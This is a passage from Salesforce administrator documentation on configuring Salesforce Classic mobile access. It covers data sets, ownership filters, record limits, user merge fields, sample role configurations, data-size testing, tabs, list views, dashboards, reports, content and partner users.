3. In the popup window, select the object for the records you want the data set to include. Salesforce lets you create parent

data sets for all custom objects and the following standard objects:

• Accounts
• Assets
• Attachments
• Cases
• Contacts
• Content
• Events
• Leads
• Notes
• Opportunities
• Price Books
• Products
• Solutions
• Tasks
• Users

Note:

• Although attachments are available as a data set, they're only supported in Salesforce Classic for Android.
Salesforce Classic for iPhone and BlackBerry don't currently support attachments.

• Salesforce Classic supports default field values only for picklists and multiselect picklists. Default field values
for other types of fields, such as checkboxes and numeric fields, do not appear in Salesforce Classic.

When adding to an existing data set, the popup window displays any object with a relationship to the selected object. This
includes child objects, and also parent objects with a master-detail or lookup relationship to the selected object.

For example, assume you created an account field called Primary Contact with a lookup relationship to the contact object.
If you add Account as a top-level data set in a mobile configuration, you see two sets of contacts when you add Contact
below Account:

• Contact: Represents the standard relationship between the account and contact objects.
• Contact (Referenced by Account): Represents any object that is the parent in a lookup or master-detail relationship

for the selected object. In this case, the contact object is referenced by the Primary Contact field on the account object.

Because Salesforce distinguishes between these two types of relationships, you could, for example, mobilize just the contacts
referenced by a custom account field without sending any child contact records to the device.

4. Click OK. The data set you created appears in the hierarchy.
5. Optionally, use filters to restrict the records that a parent or child data set includes:

a. Use the Filter by Record Ownership options to configure Salesforce to automatically synchronize records based on the
owner of the record. The possible options are:
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All Records: Salesforce automatically synchronizes all records the user can access. The All Records option
is not available for tasks and events when they are parent data sets in a mobile configuration. This helps prevent
failed data synchronization due to activity filter queries that take too long to run.

•

• User's Records: Salesforce automatically synchronizes all records the user owns.
• User's Team's Records: Salesforce automatically synchronizes all records owned by the user and the user's

subordinates in the role hierarchy.
• User's Account Team's Records: Salesforce automatically synchronizes accounts for which the user is an

account team member, but does not include accounts owned by the user.
• User's Opportunity Team's Records: Salesforce automatically synchronizes opportunities for which the

user is an opportunity team member, but does not include opportunities owned by the user.
• None (Search Only): Salesforce does not automatically synchronize any records for this data set; however, users

can use their mobile devices to search all of the records they can access.

Salesforce only displays options that relate to the selected data set. For example, selecting an account data set displays
the User's Account Team's Records option, while selecting an opportunity data set displays the User's
Opportunity Team's Records option.

If your mobile needs for an object require a combination of the available record ownership filters, you can add the same
object data set up to four times on the same hierarchy level. For example, a sales manager might want to synchronize
his opportunities, opportunities owned by his subordinates, and opportunities for which he is an opportunity team
member. In this case, you would add an opportunity data set and select User's Team's Records, then add a second
opportunity data set at the same level in the hierarchy and select User's Opportunity Team's Records. Note
that objects with only one ownership filter option, such as Case Comment, cannot be added multiple times at the same
level of the hierarchy.

b. Set the filter criteria to automatically synchronize only records that meet specific criteria in addition to the Filter by
Record Ownership option you selected. For example, you can set the filter to only include opportunity records with
amounts greater than $50,000, or contact records with the title “Buyer.”

c. To prevent a single data set from consuming all the memory on a mobile device, select the second radio button under
Set Max Record Limit and enter the maximum number of records this data set can transfer to mobile devices. Use the
Order By and Sort drop-down lists to specify which records are synchronized if the data size limit is exceeded.

If the limit is reached, Salesforce updates the records currently on the mobile device approximately every 20 minutes,
and replaces the records approximately every 24 hours in accordance with the Order By and Sort settings. For example,
if the settings are Last Modified Date and Descending, Salesforce transfers the most recently modified records to
mobile devices and removes the same number of records that were least recently modified.

If you selected the None (Search Only) Filter by Record Ownership option, the limit you set does not apply because
no records are automatically synchronized.

Tip:  Do not use Set Max Record Limit in place of filters. Only use Set Max Record Limit as a safety
mechanism, and use filters as the primary means of limiting the number of records on a mobile device. This
ensures that your mobile users receive the correct records on their devices.

Because of the memory restrictions of mobile devices, Salesforce prevents a single query from returning more than
2,500 records.

6. Be sure to test your mobile configuration to make sure the data does not exceed the total data size limit.

688

Setting Up Salesforce ClassicConfigure Salesforce Mobile Apps



7. Click Done.

See Also:
Salesforce Classic Overview for Administrators
Managing Salesforce Classic Configurations
Setting Up Salesforce Classic

Merge Fields for Mobile Filter Criteria

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

Some of the $User merge fields are available when defining filters for mobile configurations and mobile custom views. In
mobile configurations, you can use these merge fields to synchronize records where the user is linked to a record but is not the
record owner. For example, you can send cases created by the current user to the mobile device, or you can send records to the
device where the current user is referenced in a custom field. In mobile views, you can use the merge fields to define view based
on the record owner; for example, you might create a view that displays the current user's accounts with a rating of “Hot”.

The following table describes the available user merge fields:

DescriptionMerge Field

References the ID of the current user. This merge field can
be applied to fields that contain a user lookup. The valid

$User.ID

operators for this merge field are Equals and Not Equal To.
When creating mobile view filters that reference an owner
field, you can only use the $User.ID merge field.

References the username of the current user. This merge field
can be applied to any text or lookup field, except picklists. The

$User.Username

valid operators for this merge field are Equals, Not Equal To,
Greater Than or Equal, Less Than or Equal, Contains, Does
Not Contain, and Starts With.

References the first name of the current user. This merge field
can be applied to any text or lookup field, except picklists. The

$User.Firstname

valid operators for this merge field are Equals, Not Equal To,
Greater Than or Equal, Less Than or Equal, Contains, Does
Not Contain, and Starts With.

References the last name of the current user. This merge field
can be applied to any text or lookup field, except picklists. The

$User.Lastname

valid operators for this merge field are Equals, Not Equal To,
Greater Than or Equal, Less Than or Equal, Contains, Does
Not Contain, and Starts With.
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DescriptionMerge Field

References the first and last name of the current user. This
merge field can be applied to any text or lookup field, except

$User.Fullname

picklists. The valid operators for this merge field are Equals,
Not Equal To, Greater Than or Equal, Less Than or Equal,
Contains, Does Not Contain, and Starts With.

See Also:
Managing Salesforce Classic Configurations
Salesforce Classic Overview for Administrators
Defining Data Sets

Sample Data Sets
Many administrators create mobile configurations based on the functional groups in their organization because users in the
same group usually have similar mobile requirements for data. Below are sample data sets for common Salesforce groups. Your
mobile users have unique needs, but you can use the examples as a reference to help you get started with mobile configurations.

Sales Manager

Sales managers usually need to see records they own and also the records of their subordinates. They also tend to closely
monitor large deals in the pipeline.

This mobile configuration allows sales managers to see:

• The opportunities they own.
• The opportunities owned by users who report to them in the role hierarchy.
• All opportunities scheduled to close in the current quarter with an amount greater than $100,000.
• All accounts related to the opportunities.
• A subset of their contact and activity records.

Figure 1: Sample Mobile Configuration for Sales Managers

Sales Engineer

The sales engineer mobile configuration retrieves opportunities owned by the other members of the user's opportunity team,
but does not include the user's records. The configuration is opportunity-based because all accounts and contacts sent to the
device are related to the opportunities. The sales engineers would see activity history related to the opportunities on the device
and also their own activities.
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Figure 2: Sample Mobile Configuration for Sales Engineers

Account Executive

This account executive mobile configuration is account-based, which means the device pulls down the user's accounts and
opportunities related to those accounts. The opportunities are filtered so that only open opportunities scheduled to close in
the current quarter appear on the device. The Task and Event child data sets retrieve all activities related to those opportunities,
not just the user's activities. Only open tasks and events from a two-month window are sent to the device. The Task and Event
parent data sets pull down just the user's activities and restrict the activities to open tasks and events scheduled for the next
30 days. The Contact data set delivers the user's contact records, but limits the record count to the 500 most recently active
contacts.

Figure 3: Sample Mobile Configuration for Account Executives

Customer Support Representative

Customer support representatives are focused primarily on cases and solutions. This mobile configuration delivers all open
cases to the user's device, along with related accounts, contacts, case comments, case history, tasks, and events. The Case
Solution child data set sends all solutions related to the cases, and the Solution data set lets the user search for solutions from
the Solutions tab on the device. The support representatives also have access to a subset of their activity records.
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Figure 4: Sample Mobile Configuration for Customer Support Representatives

See Also:
Salesforce Classic Overview for Administrators
Managing Salesforce Classic Configurations
Defining Data Sets

Testing Salesforce Classic Configurations

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic data sets:

“Manage Mobile Configurations”To test Salesforce Classic configurations:

When you create a Salesforce Classic configuration, you specify a total data size limit for the configuration. The total data
size limit prevents Salesforce from sending too much data to the mobile devices of users assigned to the mobile configuration.
After defining the data sets, it’s important to test the mobile configuration to make sure the total data size limit isn’t exceeded.

To estimate the size of the data set that the mobile configuration will deliver to a user's device:

1. Click Mobile Administration > Salesforce Mobile > Configurations, and click the name of the mobile configuration
you want to test.

2. In the Data Sets related list, click Edit.

692

Setting Up Salesforce ClassicConfigure Salesforce Mobile Apps



3. In the Test Data Size section, click the lookup icon next to the Select a user field to choose the user you want to test.
While users must be mobile-enabled in order to assign them to mobile configurations, you can test the configuration's
data size against any user account.

The Select a user field defaults to the name of the user currently logged in; however, it is important to test a mobile
configuration with the accounts of users who will actually be assigned to the configuration, particularly users who own a
large number of records.

4. Select the Include metadata checkbox to include metadata in the estimate. Metadata consists of page layout and schema
information, and the amount of metadata sent to a device can be very high depending on the size of your organization and
the complexity of its setup.

Warning:  It might take a while for Salesforce to calculate the metadata size in addition to the data size. Even if
you choose to hide the metadata in your test results, the metadata is still factored into the total data size when the
mobile device synchronizes with Salesforce.

5. Click Estimate Data Size.

The size of each data set is calculated. Results display in the hierarchy tree, which is the left pane of the data set region at
the top of the page. Additional results appear in the Test Data Size section below the hierarchy.

• In the hierarchy tree, two numbers appear next to each data set. The first represents the number of records generated
by the data set, and the second represents the total size of the data set in bytes or kilobytes. This breakdown is useful
for identifying which data sets might require additional filtering criteria to reduce the size.

• The Test Data Size section provides an estimate of the data that the current mobile configuration would deliver to the
selected user's device, including:

◊ The size and number of records in each object's data set.
◊ The total size and number of records, which includes records in the data set and marked records. A marked record

is a record that is not part of a user's mobile configuration. There are two ways marked records can become part of
the data set:

- The user downloads records to his or her device through online searches, and the records are flagged so that
they get sent to the user's device every time the device synchronizes with Salesforce.

- Records in the user's data set contain lookup fields to records that do not match the mobile configuration's filter
criteria. Salesforce synchronizes the records referenced in the lookup fields so that users do not encounter broken
links in the mobile app.

Tip:  For an accurate count of the marked records, synchronize the data in the mobile app before
estimating the data size. To synchronize the data:

- On an Android device, tap Application Info > Sync Now > Refresh All Data.
- On a BlackBerry device, open the menu and select System Info, then open the menu and select

Refresh All Data.
- On an iPhone device, tap More, then tap App Info. Tap Sync Now, then tap Refresh All Data.

◊ The size of the metadata that would be sent to the device for the user, if you selected the Include metadata checkbox.
◊ The total mobilized data set, which is the sum of all the records.

• Reports are not included in the data size estimate.
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6. Compare the test results to the total data size limit that was set for the configuration; the limit is located in the top of the
Test Data Size section. Click the size limit to increase or decrease the value on the Edit Mobile Configuration page.

• If the total data size is below the limit, the selected user can safely be assigned to the mobile configuration. However,
keep in mind that the test results are an estimate because different devices have different storage algorithms.

• If the total data size exceeds the limit, reduce the size of the data by reducing the scope of your data set, refining the
filter criteria of your data sets, deleting a data set, or removing fields from the mobile page layout. Repeat the testing
process until the data is below the total limit.

Note:  The data size estimate in the Test Data Size section does not automatically refresh if you edit the data
sets. Click Refresh Data Size to update the test results.

See Also:
Salesforce Classic Overview for Administrators
Managing Salesforce Classic Configurations
Managing Salesforce Classic Devices
Setting Up Salesforce Classic

Editing Object Properties for Salesforce Classic

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic configurations:

“Manage Mobile Configurations”To edit Salesforce Classic object properties:

You can change the properties of standard and custom objects in the Salesforce Classic app. For example, you can restrict the
permissions of Salesforce Classic users, or you can exclude unnecessary fields from the object's mobile page layout.

Salesforce Classic object properties are customized per mobile configuration. To edit mobile object properties:

1. Click Mobile Administration > Salesforce Mobile > Configurations.
2. Click the name of the mobile configuration you want to modify.
3. In the Mobile Object Properties related list, click Edit next to an object name.

Only objects you mobilized in the configuration's data set appear in the related list. You can’t change the properties of the
user object.

4. From the Edit Mobile Configuration page, you can:

• Remove Mobile Permissions
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• Customize Salesforce Classic Page Layouts

5. Click Save.

Remove Mobile Permissions

The Salesforce Classic app inherits the user's permissions from Salesforce. Some administrators want to further restrict the
permissions of users when they access Salesforce data in Salesforce Classic, usually due to limitations of the app or the possibility
of user error. For example, users can inadvertently delete a record because they don't realize that deleting a record in Salesforce
Classic also deletes the record in Salesforce. If this is a concern, administrators can prevent users from deleting records in the
mobile application, regardless of their standard and custom object permissions in Salesforce. Also, Salesforce Classic doesn’t
support all Salesforce features, such as S-controls and Apex. If your business process for an object is unsupported by Salesforce
Classic, you might choose to prevent mobile users from updating those records in the app.

In the Permissions section, select which permissions to remove from mobile users for this object. Use the Deny Create, Deny
Edit, or Deny Delete checkboxes to prevent users from creating, editing, or deleting records in Salesforce Classic.

Note: Currently, you can't block mobile permissions for the content object.

Customize Salesforce Classic Page Layouts

The Salesforce Classic app inherits the user's page layouts from Salesforce. Administrators may want to exclude some fields
from each object's mobile page layout because unnecessary fields consume memory and make it harder for users to scroll
through pages on the mobile device.

In the Excluded Fields section, select which fields to display on the mobile device for this object. To add or remove fields,
select a field name, and click the Add or Remove arrow.

• Administrators can view all available fields per object, regardless of field-level security.
• Certain fields are required in order for Salesforce Classic to communicate with Salesforce. Those fields don’t display in

the Available Fields box because they are mandatory and can’t be excluded from mobile page layouts.
• Fields used in custom mobile views can’t be excluded from mobile page layouts.
• If you mobilize the content object, all of the content object's fields display in the Available Fields box; however, the layout

of the content detail page in the Salesforce Classic app is hard-coded to show only a few fields. Excluding fields for the
content object doesn't affect the page layout in the app.

See Also:
Salesforce Classic Overview for Administrators
Managing Salesforce Classic Configurations
Managing Salesforce Classic Tabs
Creating Links to Web and Visualforce Mobile Pages for Salesforce Classic
Setting Up Salesforce Classic
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Assigning Tabs to a Salesforce Classic Configuration

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic configurations:

“Manage Mobile Configurations”To customize Salesforce Classic tabs:

For each mobile configuration, you can select the tabs that appear in the Salesforce Classic app and define the order of the
tabs. The available tabs for a mobile configuration include:

• Standard object tabs

• Custom object tabs

• Visualforce and web tabs that have been enabled for Salesforce Classic

Warning: Not all websites and Visualforce features are supported on mobile devices. Carefully review the best
practices for creating mobile-friendly pages before enabling Visualforce or web tabs for the Salesforce Classic app.

By default, tabs work the same in the Salesforce Classic app as in the full Salesforce site—if an object's tab is hidden in
Salesforce, it’s hidden in Salesforce Classic as well.

Note:  If you customize mobile tabs, the tabs you select for the mobile configuration are sent to users' mobile devices
even if the tabs have not been added to a configuration. Although the tabs are sent to the device, they only display
in the Salesforce Classic app if users have permission to view the tab.

There are several reasons you might want to hide an object's tab in Salesforce Classic even though the object records are sent
to the device. The Salesforce Classic app has much less screen space to display a row of tabs, so occasionally you might choose
to reduce the number of tabs on the device. Also, sometimes a custom object has a relationship to a standard object, and users
access the custom object record from the parent object record. In that case, you could mobilize the custom object but hide the
tab.

To assign tabs to a mobile configuration:

1. Click Mobile Administration > Salesforce Mobile > Configurations, and then click the name of a mobile configuration.
2. In the Mobile Tabs related list, click Customize Tabs to define mobile tabs for the first time. If you have already set up

the mobile tabs, click Edit.
3. Select tabs from the Available Tabs list, and click the Add arrow to add them to the mobile configuration.
4. In the Selected Tabs list, choose tabs and click the Up and Down arrows to arrange the tabs in the order they should

appear in the Salesforce Classic app.
5. Click Save.
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Note:  iPhone users can customize the order of their tabs in the Salesforce Classic app. If the user customizes their
tab order, any administrator changes to the tab order in the mobile configuration are ignored by the app, and any
newly mobilized tabs are added below the user's existing tabs.

See Also:
Managing Salesforce Classic Tabs
Enabling Web and Visualforce Tabs for Salesforce Classic
Salesforce Classic Overview for Administrators
Managing Salesforce Classic Configurations

Enabling Web and Visualforce Tabs for Salesforce Classic

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

You can make web and Visualforce tabs available in the Salesforce Classic app. When you build the web tab or Visualforce
tab, edit the tab properties and select the Mobile Ready checkbox to ensure that the web page or Visualforce page displays
and functions properly on a mobile device. Selecting the checkbox adds the tab to the list of available tabs for your mobile
configurations.

It is important to note that most mobile browsers have technical limitations concerning display size, scripts, processor speed,
and network latency. Review the following considerations before mobilizing your web and Visualforce pages to ensure that
they are compatible with mobile browsers.

Mobile Web Tab Considerations

Consider the following when defining a web tab that will be used in the Salesforce Classic app:

• The ability to mobilize web tabs is only available for BlackBerry and iPhone devices. If you mobilize a web tab, keep in
mind that Android users can’t view the tab in Salesforce Classic.

• The minimum BlackBerry operating system requirement for web tabs is 4.3.
• The tab type must be URL. The mobile application can’t run S-controls.
• Some web pages contain JavaScript and Flash, but not all mobile browsers support them:

◊ Apple's Safari browser supports JavaScript, but not Flash.
◊ The BlackBerry browser has limited support for JavaScript and no support for Flash.

• Before mobilizing a web tab, navigate to the target URL on one of your organization's mobile devices to verify that it works
as expected in a mobile browser. In the event that your organization's device inventory includes phones with different
operating systems—for example, both iPhones and BlackBerry smartphones—be sure to test on each type of device. If
users can’t accomplish the necessary tasks on the web page from a mobile browser, do not mobilize the web tab.

• JavaScript must be enabled on BlackBerry devices in order to view JavaScript web pages. The BlackBerry administrator
can globally enable JavaScript from the BlackBerry Enterprise Server. Users can also enable JavaScript on a BlackBerry
smartphone by opening the BlackBerry browser, selecting Options > Browser Configuration, and then selecting the
Support JavaScript checkbox.
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Visualforce Mobile Tab Considerations

Consider the following when defining a mobile Visualforce tab:

• Visualforce Mobile is only available for BlackBerry and iPhone. If you mobilize a Visualforce tab, keep in mind that Android
users can’t view the tab in Salesforce Classic.

• The Salesforce Classic app can run on BlackBerry operating system versions 4.3 through 7.0. For optimum performance,
however, Salesforce recommends running Visualforce Mobile on BlackBerry smartphones installed with at least version
6.0.

• Because the display size is limited on mobile browsers, we recommend redesigning the Visualforce page to optimize it for
mobile users:

◊ Set the sidebar and showHeader attributes on the <apex:page> tag to false. Phones have small screens and
limited processing power, so it is essential that the page suppresses the tab header and sidebar.

◊ Set the standardStylesheets attribute on the <apex:page> tag to false. The standard Salesforce stylesheet
causes pages to load slowly on the device. Additionally, most BlackBerry browsers older than the 6.0 OS can’t properly
interpret CSS . The best approach to adding a stylesheet to your page is to include a <style> section just below the
<apex:page> component.

◊ Set the columns attribute on the <apex:pageBlockSection> component to 1. There is not enough room on a
mobile device’s screen to display two columns, so specifying a one-column layout prevents fields from wrapping
awkwardly on the page.

• Splash pages don’t display in the Salesforce Classic app.
• In the Salesforce Classic app, the Visualforce page is embedded in a tab, so you should avoid using tabs for navigation in

mobile Visualforce pages.
• Even if you know that the mobile browser supports the JavaScript in your Visualforce page, keep your use of JavaScript to

a minimum. Mobile devices generally have slow network connections, and too many scripts running on a page creates a
poor user experience. To minimize the amount of JavaScript on your mobile Visualforce pages, try to build them using
mostly HTML.

• All Visualforce pages contain JavaScript, even if you don’t create pages that use JavaScript code. JavaScript must be enabled
on BlackBerry devices in order to view Visualforce pages. The BlackBerry administrator can globally enable JavaScript
from the BlackBerry Enterprise Server. Users can also enable JavaScript on a BlackBerry smartphone by opening the
BlackBerry browser, selecting Options > Browser Configuration, and then selecting the Support JavaScript checkbox.

• The embedded browser in the BlackBerry client application doesn’t have built-in navigation. If your Visualforce page is a
wizard, you should provide navigation links that allow users to return to the previous page and advance to the next page.

• BlackBerry administrators should be aware that the download size setting on the BlackBerry Enterprise Server affects how
much data can be pushed to the device. Check that the download size setting is appropriate, and be sure to test your
Visualforce pages before deploying them to your Salesforce Classic users.

• User agent inspection can be executed in a custom controller to support multiple devices. You can do this by inspecting
the appropriate result of the getHeaders() method on the current page reference.

See Also:
Managing Salesforce Classic Tabs
Managing Salesforce Classic Configurations
Creating Links to Web and Visualforce Mobile Pages for Salesforce Classic
Assigning Tabs to a Salesforce Classic Configuration
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Creating List Views for Salesforce Classic

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic devices and users:

“Manage Mobile Configurations”To manage Salesforce Classic custom views:

You can create custom list views for Salesforce Classic users. Custom list views for Salesforce Classic, also called mobile views,
are different from Salesforce custom views in these ways:

• Administrators set up mobile views for each mobile configuration. The views are available to all users assigned to the
configuration, and administrators can’t restrict visibility to certain groups of users within the configuration. Each mobilized
object in a mobile configuration can have up to 10 custom views.

• Users can’t filter mobile views by All Records or My Records. The views apply to all records stored locally on the device
regardless of ownership; however, ownership filters can be applied using the additional fields in the search criteria.

• Mobile views don't support filter logic.

• Mobile views are limited to a two-column display.

• Users can sort mobile views in ascending or descending order by up to two fields.

For each mobile configuration, you can define up to 10 custom views per object. These views are then pushed to the devices
of users assigned to the affected configurations. To create a custom view for Salesforce Classic:

1. Click Mobile Administration > Salesforce Mobile > Configurations, and then click the name of a mobile configuration.
You might need to create a mobile configuration if you haven't already.

2. Scroll down to the Mobile Views related list.
3. Choose an object type from the Select an object drop-down list, and then click New Mobile View. Only objects included

in the mobile configuration's data set appear in the drop-down list. You can’t create mobile views for the user object.
4. Enter the view name.

Because display space on mobile devices is limited, the maximum length of a mobile view name is 30 characters.

5. In the Specify Filter Criteria section, enter conditions that the selected items must match; for example, Amount is
greater than $100,000.

a. Choose a field from the first drop-down list.

Note:  You can’t create views based on fields you excluded from mobile page layouts or fields that are hidden
for all profiles and permission sets.

b. Choose a filter operator.
c. In the third field, enter the value to match.
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Warning:  Note the following about filter criteria values for mobile views:

• You can use the $User.ID merge field as a value in your filter criteria to reference the current user. You
can't enter user names in your filter criteria.

• You can only enter special date values in your filter criteria, not actual dates.
• You can't use FISCAL special date values in the filter criteria.

d. Select Match All if items in the mobile view should match all the criteria you entered. Select Match Any if items in
the mobile view should match any of the criteria you entered. Mobile custom views do not support advanced filtering
options.

6. In the Select Fields to Display section, select the fields to use as display columns.

The default fields are automatically selected. You can choose up to two different columns of data fields to display in your
mobile custom view.

7. In the Define Sort Order section, optionally set a primary and secondary sort order for the view.

a. Select a field in the Order By drop-down list. You can sort by fields that have been excluded from the object's mobile
page layout.

b. Set the sort order to Ascending or Descending.

8. Click Save.

See Also:
Managing Salesforce Classic Views
Managing Salesforce Classic Configurations
Managing Salesforce Classic Devices
Setting Up Salesforce Classic

Setting Up Mobile Dashboards

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view mobile configurations:

“Manage Mobile Configurations”To mobilize dashboards:

You can make the Dashboards tab available in Salesforce Classic by adding it to the tabs for a mobile configuration. Mobile
dashboards allow field users to keep up with corporate metrics and key performance indicators even when they are away from
their desks.
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Note the following about mobile dashboards:

• The Dashboards tab in the mobile application launches an embedded browser to display the dashboards.

• Due to screen size limitations, mobile dashboards display in a single column.

• Links to custom report details are disabled in mobile dashboards.

• The first time a user visits the Dashboards tab in Salesforce Classic, the mobile application requests the last dashboard the
user viewed in Salesforce. Depending on the strength of the cellular or WiFi signal, it could take several minutes before
the dashboard displays on the page.

• Dashboards do not automatically refresh in the mobile application. Users can request a dashboard refresh by clicking the
Refresh button.

• Users are able to work offline in the mobile application. Without a wireless connection, users can see the last viewed
dashboard, but they cannot refresh the dashboard or select a different one.

• The minimum BlackBerry operating system requirement for mobile dashboards is 4.5. Mobile dashboards are compatible
with version 4.3, but tables in the dashboards might not display properly.

• BlackBerry administrators should be aware that the download size setting on the BlackBerry Enterprise Server affects how
much dashboard data can be pushed to the device. Check that the download size setting is appropriate, and be sure to test
your dashboards before deploying them to your mobile users.

Note:  Currently, dashboards are only available in the BlackBerry and iPhone mobile client applications.

To enable mobile dashboards:

1. Click Mobile Administration > Salesforce Mobile > Configurations, and then click the name of a mobile configuration.
2. In the Mobile Tabs related list, click Customize Tabs to define mobile tabs for the first time. If you have already set up

the mobile tabs, click Edit.
3. Select Dashboards from the Available Tabs list, and click the Add arrow to add it to the mobile configuration. The

Available Tabs list includes standard object tabs and custom object tabs. It can also include web and Visualforce tabs.

Warning:  If you have not yet customized tabs in the mobile configuration, you must select all the tabs that should
appear in the mobile application, not just the Dashboards tab.

4. In the Selected Tabs list, choose the Dashboards tab and click the Up and Down arrows to define where the Dashboards
tab should appear in the mobile application.

5. Click Save.

See Also:
Setting Up Salesforce Classic

701

Setting Up Salesforce ClassicConfigure Salesforce Mobile Apps



Enabling Reports in Salesforce Classic

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“Manage Public Reports”To create, edit, and delete public report folders:

“View Setup and Configuration”To view Salesforce Classic configurations:

To enable reports in the Salesforce Classic app:

1. Create a Mobile Reports folder in Salesforce. From the reports home page in the full site, click Create New Folder.
2. In the Report Folder field, enter: Mobile Reports.

The server won’t load reports on mobile devices unless this folder is named Mobile Reports. Be sure to check for any
typos in the name before saving the folder. Additionally, Salesforce doesn’t require folder names to be unique. Salesforce
Classic users can see any report stored in all folders named Mobile Reports unless you restrict access with the folder visibility
option.

3. Choose a Public Folder Access option. This option doesn’t affect the ability of mobile users to run reports.
4. Optionally, select any unfiled reports and click Add to store them in the Mobile Reports folder. You can also add reports

to the folder after saving the folder.
5. Choose a folder visibility option.

• This folder is accessible by all users gives every user in your organization the ability to see the list of
mobile reports from their devices.

• This folder is accessible only by the following users lets you grant access to a desired set of users.

Don’t make the Mobile Reports folder private unless you want to hide mobile reports from all users, including
yourself.

6. Click Save.
7. Add reports to the Mobile Reports folder. Click the report name on the reports home page, then click Save As and save

the report in the Mobile Reports folder.

After saving the report, you can edit the options to make the report easier to view on a mobile device. For example, you
might reduce the number of columns or enter additional filtering criteria.

8. Add the Reports tab to your mobile configurations. Click Mobile Administration > Salesforce Mobile > Configurations,
then click the name of a mobile configuration.

9. In the Mobile Tabs related list, click Customize Tabs to define mobile tabs for the first time. If you’ve already set up the
mobile tabs, click Edit.

10. Select Reports from the Available Tabs list, then click the Add arrow to add it to the mobile configuration. The Available
Tabs list includes standard object tabs and custom object tabs. It can also include web and Visualforce tabs.
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Warning:  If you have not yet customized tabs in the mobile configuration, you must select all the tabs that should
appear in the Salesforce Classic, not just the Reports tab.

11. In the Selected Tabs list, choose the Reports tab and click the Up and Down arrows to define where the Reports tab should
appear in the Salesforce Classic app.

12. Click Save.

Note:  Currently, reports in Salesforce Classic aren’t available on Android or iPhone devices.

See Also:
Setting Up Salesforce Classic

Setting Up Salesforce CRM Content for Salesforce Classic

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic configurations:

“Manage Mobile Configurations”To create, change, or delete Salesforce Classic data sets:

Note the following about how Salesforce CRM Content is implemented in Salesforce Classic:

• Content record information is synchronized to the device; however, the files associated with the content records are not.
This allows users to deliver content from the app even when a file is too large to be downloaded to a mobile device.

• Users can't search for a specific piece of content in the app. They can only share the content available on the Content tab,
which is automatically synchronized to their device based on the filters in their assigned mobile configuration.

• Users can't view a list of their subscribed content in the app. They also can't filter the list of records on the Content tab
based on a particular library.

• While users can preview and share content from the app, they can't update the file associated with a content record. If they
have the required permissions, they can edit the fields on the content detail page.

• Users must have a data connection to preview and deliver content. Without a data connection, they can only view the
content detail page.

• Content in Salesforce Classic is only supported on BlackBerry and iPhone devices.

• Content is not available in the free version of Salesforce Classic.

• You can't block mobile permissions for the content object. Currently, the content object in Salesforce Classic is read-only.

• You can't edit the mobile page layout for the content object. The content detail page in the app is hard-coded to display
only a few fields.
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To set up Content for a Salesforce Classic configuration:

1. From Setup, click Mobile Administration > Salesforce Classic > Configurations, and then click the name of a mobile
configuration.

2. In the Data Sets related list, click Edit.
3. Click Add....
4. In the popup window, select Content, then click OK.
5. Use field filters to specify which content records are synchronized.

Because users can't search for content in the Salesforce Classic app, it's essential to set up filters that make important
content available on the device. You can't create filters based on libraries or subscriptions, but here are a few options for
setting up useful filter conditions:

• Date: Filter on the Last Modified Date, Content Modified Date, or Created Date fields. Use special date
values like LAST 90 DAYS or LAST 180 DAYS to ensure that recently updated content records are synchronized.

• Owner: Filter on the author if certain people in your organization are responsible for publishing content.
• File Type: Filter on certain types of documents. For example, your opportunity team might generally be interested in

presentations or PDF documents.
• Custom Fields: If you created custom content fields that help you categorize your content, filter on the custom fields.

For example, if you built a Functional Use field with picklist values, you could set up a filter condition where
Functional Use equals Sales.

6. Optionally, prevent content records from consuming all the memory on a mobile device by selecting the second radio
button under Set Max Record Limit and entering the maximum number of content records this configuration can transfer
to mobile devices. Use the Order By and Sort drop-down lists to specify which records are synchronized if the data size
limit for your mobile configuration is exceeded.

7. Click Done.

See Also:
Setting Up Salesforce Classic
Setting Up Salesforce CRM Content
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Configuring Salesforce Classic Access for Partner Users

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

“View Setup and Configuration”To view Salesforce Classic configurations, data sets, mobile
devices, and users:

“Manage Mobile Configurations”To create, change, or delete Salesforce Classic configurations
and data sets, test mobile configurations, edit mobile object
properties, and manage mobile custom views:

Note: Starting in Summer ’13, the partner portal is no longer available for organizations that aren’t currently using
it. Existing organizations continue to have full access. If you don’t have a partner portal, but want to easily share
records and information with your partners, try Communities.

Existing organizations using partner portals may continue to use their partner portals or transition to Communities.
Contact your Salesforce Account Executive for more information.

You can allow partner users to access partner portal data on mobile devices using the Salesforce Classic app.

Tips for setting up Salesforce Classic access for partner users:

• Before setting up Salesforce Classic for partner users, you must configure partner user accounts and purchase mobile licenses
for each partner portal user that will be using Salesforce Classic. Partner user profiles must be assigned to at least one active
partner portal before partner users can use Salesforce Classic. If a user profile is assigned to multiple partner portals, only
the first assigned partner portal will be accessible using Salesforce Classic.

• Custom mobile list views don’t affect list views in the partner portal.

• If you make User data sets available in the Salesforce Classic app, partners can assign objects to their partner account users
and all internal users. If you don’t make User data sets available, partners can only assign objects to internal or partner
account users who are associated with records that you’ve made available on the mobile device.

See Also:
Setting Up Salesforce Classic
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Creating Links to Web and Visualforce Mobile Pages for Salesforce Classic

Free version available in: All editions except Database.com

Full version available in: Unlimited and Developer Editions, and for an additional cost in: Professional and Enterprise
Editions

User Permissions Needed

